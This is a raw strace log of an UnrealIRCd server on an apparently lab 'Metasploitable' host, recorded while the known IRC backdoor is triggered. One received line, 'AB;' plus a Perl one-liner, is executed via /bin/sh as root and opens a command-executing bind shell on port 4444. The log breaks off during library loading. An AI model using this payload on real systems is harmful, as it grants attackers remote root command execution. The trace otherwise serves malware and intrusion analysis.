4519  07:21:08.977096 select(1024, [2 3 4 7 9], [], NULL, {0, 440000}) = 1 (in [7], left {0, 370000})

4519  07:21:09.043621 clock_gettime(CLOCK_MONOTONIC, {1678, 860630622}) = 0

4519  07:21:09.043634 recv(7, "PRIVMSG  #testit2 BLABLALBLALBLALBLALBLALBLALBLALABLLALBLA\n", 8192, 0) = 59

4519  07:21:09.043665 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043684 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043699 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043714 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043728 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043742 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043756 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043770 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043783 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043797 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043811 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043824 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043838 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043852 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043865 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043879 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043892 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043906 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043920 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043934 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043947 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.043992 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.044023 time(NULL)        = 1495624869

4519  07:21:09.044034 time(NULL)        = 1495624869

4519  07:21:09.044047 gettimeofday({1495624869, 44050}, NULL) = 0

4519  07:21:09.044058 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:21:09.044087 clock_gettime(CLOCK_MONOTONIC, {1678, 861100378}) = 0

4519  07:21:09.044098 gettimeofday({1495624869, 44101}, NULL) = 0

4519  07:21:09.044108 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 900000})

4519  07:21:09.148556 clock_gettime(CLOCK_MONOTONIC, {1678, 965591041}) = 0

4519  07:21:09.148591 accept(2, 0, NULL) = 5

4519  07:21:09.148613 getpeername(5, {sa_family=AF_INET, sin_port=htons(44423), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:21:09.148659 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:21:09.148671 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:21:09.148684 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:21:09.148696 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:21:09.148707 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:21:09.148718 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:21:09.148730 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:21:09.148746 clock_gettime(CLOCK_MONOTONIC, {1678, 965760062}) = 0

4519  07:21:09.148758 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:21:09.148770 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:21:09.148780 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:21:09.148789 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:21:09.148799 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:21:09.148824 send(6, "*\347\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:21:09.148841 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:21:09.148864 gettimeofday({1495624869, 148868}, NULL) = 0

4519  07:21:09.148877 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 990000})

4519  07:21:09.155577 clock_gettime(CLOCK_MONOTONIC, {1678, 972606878}) = 0

4519  07:21:09.155625 recvfrom(6, "*\347\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0b\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:21:09.155681 close(6)          = 0

4519  07:21:09.155706 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:21:09.155723 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:21:09.155779 time(NULL)        = 1495624869

4519  07:21:09.155791 time(NULL)        = 1495624869

4519  07:21:09.155803 gettimeofday({1495624869, 155807}, NULL) = 0

4519  07:21:09.155815 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:21:09.155844 clock_gettime(CLOCK_MONOTONIC, {1678, 972856711}) = 0

4519  07:21:09.155854 gettimeofday({1495624869, 155858}, NULL) = 0

4519  07:21:09.155865 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [9], left {0, 840000})

4519  07:21:09.313900 clock_gettime(CLOCK_MONOTONIC, {1679, 130909366}) = 0

4519  07:21:09.313900 recv(9, "PRIVMSG  #testit3 Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\n", 8192, 0) = 55

4519  07:21:09.313901 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.313901 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.313901 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.313901 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.313902 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.313902 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.313902 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.313902 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.313902 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.313903 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.313906 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.313920 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.313934 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.313947 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.313960 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.313974 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.313987 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.314000 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.314062 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.314109 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.314123 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.314137 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:09.314154 gettimeofday({1495624869, 314158}, NULL) = 0

4519  07:21:09.314186 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:21:09.314227 clock_gettime(CLOCK_MONOTONIC, {1679, 131239709}) = 0

4519  07:21:09.314238 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:21:09.314266 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:21:09.314286 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:21:09.314299 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:21:09.314313 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 7948

7948  07:21:09.314382 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

7948  07:21:09.314396 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

7948  07:21:09.314406 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7948  07:21:09.314420 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

7948  07:21:09.314582 brk(0)            = 0x80f9000

7948  07:21:09.314623 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7948  07:21:09.314682 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef1000

7948  07:21:09.314714 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7948  07:21:09.314733 open("/etc/ld.so.cache", O_RDONLY) = 1

7948  07:21:09.314746 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7948  07:21:09.314764 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7ee9000

7948  07:21:09.314774 close(1)          = 0

7948  07:21:09.314785 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7948  07:21:09.314801 open("/lib/libncurses.so.5", O_RDONLY) = 1

7948  07:21:09.314814 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

7948  07:21:09.314907 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

7948  07:21:09.314946 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7eb9000

7948  07:21:09.314975 mmap2(0xb7ee6000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7ee6000

7948  07:21:09.314976 close(1)          = 0

7948  07:21:09.314976 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7948  07:21:09.314976 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7948  07:21:09.314976 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7948  07:21:09.314977 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7948  07:21:09.315636 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7eb5000

7948  07:21:09.315665 mmap2(0xb7eb7000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7eb7000

7948  07:21:09.315697 close(1)          = 0

7948  07:21:09.315709 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7948  07:21:09.315723 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7948  07:21:09.315737 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7948  07:21:09.315824 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7948  07:21:09.315840 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7eb4000

7948  07:21:09.315854 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d65000

7948  07:21:09.315865 mmap2(0xb7eae000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7eae000

7948  07:21:09.315880 mmap2(0xb7eb1000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7eb1000

7948  07:21:09.315893 close(1)          = 0

7948  07:21:09.315916 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d64000

7948  07:21:09.315927 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d646b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

7948  07:21:09.315990 mprotect(0xb7eae000, 4096, PROT_READ) = 0

7948  07:21:09.316027 munmap(0xb7ee9000, 29913) = 0

7948  07:21:09.316052 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7948  07:21:09.316066 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

7948  07:21:09.316120 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfb094c0) = -1 ENOTTY (Inappropriate ioctl for device)

7948  07:21:09.316167 brk(0)            = 0x80f9000

7948  07:21:09.316176 brk(0x80fa000)    = 0x80fa000

7948  07:21:09.316188 brk(0x80fb000)    = 0x80fb000

7948  07:21:09.316205 getuid32()        = 0

7948  07:21:09.316218 getgid32()        = 0

7948  07:21:09.316227 geteuid32()       = 0

7948  07:21:09.316236 getegid32()       = 0

7948  07:21:09.316249 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7948  07:21:09.316263 time(NULL)        = 1495624869

7948  07:21:09.316276 brk(0x80fc000)    = 0x80fc000

7948  07:21:09.316290 brk(0x80fd000)    = 0x80fd000

7948  07:21:09.316309 open("/proc/meminfo", O_RDONLY) = 1

7948  07:21:09.316330 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

7948  07:21:09.316348 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef0000

7948  07:21:09.316359 read(1, "MemTotal:      1035240 kB\nMemFree:        535192 kB\nBuffers:         65112 kB\nCached:         277896 kB\nSwapCached:          0 kB\nActive:         254520 kB\nInactive:       217448 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        534952 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4076 kB\nWriteback:           0 kB\nAnonPages:      128968 kB\nMapped:          52008 kB\nSlab:            16964 kB\nSReclaimable:     8716 kB\nSUnreclaim:       8248 kB\nPageTables:       1960 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

7948  07:21:09.316442 close(1)          = 0

7948  07:21:09.316453 munmap(0xb7ef0000, 4096) = 0

7948  07:21:09.316464 brk(0x80fe000)    = 0x80fe000

7948  07:21:09.316490 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7948  07:21:09.316503 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7948  07:21:09.316515 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7948  07:21:09.316527 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7948  07:21:09.316539 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

7948  07:21:09.316550 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

7948  07:21:09.316564 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7948  07:21:09.316575 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7948  07:21:09.316618 uname({sys="Linux", node="metasploitable", ...}) = 0

7948  07:21:09.316680 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

7948  07:21:09.316698 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7948  07:21:09.316716 brk(0x8100000)    = 0x8100000

7948  07:21:09.316727 getcwd("/etc/unreal", 4096) = 12

7948  07:21:09.316742 getpid()          = 7948

7948  07:21:09.316758 getppid()         = 4519

7948  07:21:09.316773 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7948  07:21:09.316793 stat64("/sbin/sh", 0xbfb09498) = -1 ENOENT (No such file or directory)

7948  07:21:09.316805 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7948  07:21:09.316822 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7948  07:21:09.316846 socket(PF_FILE, SOCK_STREAM, 0) = 1

7948  07:21:09.316859 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7948  07:21:09.316871 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7948  07:21:09.316892 close(1)          = 0

7948  07:21:09.316903 socket(PF_FILE, SOCK_STREAM, 0) = 1

7948  07:21:09.316913 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7948  07:21:09.316923 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7948  07:21:09.316941 close(1)          = 0

7948  07:21:09.316954 open("/etc/nsswitch.conf", O_RDONLY) = 1

7948  07:21:09.316968 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

7948  07:21:09.316984 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef0000

7948  07:21:09.316995 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

7948  07:21:09.317047 read(1, "", 4096) = 0

7948  07:21:09.317056 close(1)          = 0

7948  07:21:09.317066 munmap(0xb7ef0000, 4096) = 0

7948  07:21:09.317127 open("/etc/ld.so.cache", O_RDONLY) = 1

7948  07:21:09.317141 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7948  07:21:09.317189 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7ee9000

7948  07:21:09.317199 close(1)          = 0

7948  07:21:09.317210 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7948  07:21:09.317225 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

7948  07:21:09.317239 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 